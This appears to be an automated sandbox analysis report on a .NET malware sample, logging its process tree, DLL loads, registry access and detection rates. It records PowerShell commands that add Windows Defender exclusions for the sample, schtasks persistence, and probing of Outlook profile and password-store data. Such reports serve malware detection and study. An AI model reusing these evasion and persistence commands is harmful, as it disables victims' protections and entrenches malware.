Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 7495 P.exe	Virustotal: Detection: 43%
Source: 7495 P.exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\7495 P.exe

File read: C:\Users\user\Desktop\7495 P.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7495 P.exe "C:\Users\user\Desktop\7495 P.exe"
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Users\user\Desktop\7495 P.exe "C:\Users\user\Desktop\7495 P.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Users\user\Desktop\7495 P.exe "C:\Users\user\Desktop\7495 P.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\7495 P.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\7495 P.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\7495 P.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 7495 P.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 7495 P.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.cs

